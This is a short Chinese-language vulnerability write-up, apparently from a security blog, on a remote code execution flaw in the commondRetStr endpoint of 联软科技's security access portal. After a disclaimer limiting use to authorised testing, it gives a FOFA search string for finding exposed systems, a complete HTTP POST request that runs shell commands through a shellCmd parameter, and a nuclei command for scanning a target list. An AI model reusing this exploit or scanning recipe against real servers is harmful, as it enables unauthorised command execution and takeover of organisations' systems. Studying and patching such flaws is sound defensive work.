0x01 阅读须知
融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
全球最早的网络准入控制厂商之一,联软科技再获亿级的融资,得到资本的高度认可。联软科技安全准入门户平台 commondRetStr处存在远程代码执行漏洞,攻击者可以获取服务器权限。
0x03 漏洞复现
fofa:"UniSSOView"
1.抓取页面的报文,并使用POC进行id命令执行,得到回显
POST /TunnelGateway/commondRetStr HTTP/1.1
Host: {{Hostname}}
Cookie: sdp_jsessionid=AA249E70ED8C27AEBF5623728AEA3F41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
shellCmd=id
2.nuclei验证脚本已发表于知识星球
nuclei.exe -t lianruananjie-commondRetStr-rce.yaml -l subs.txt -stats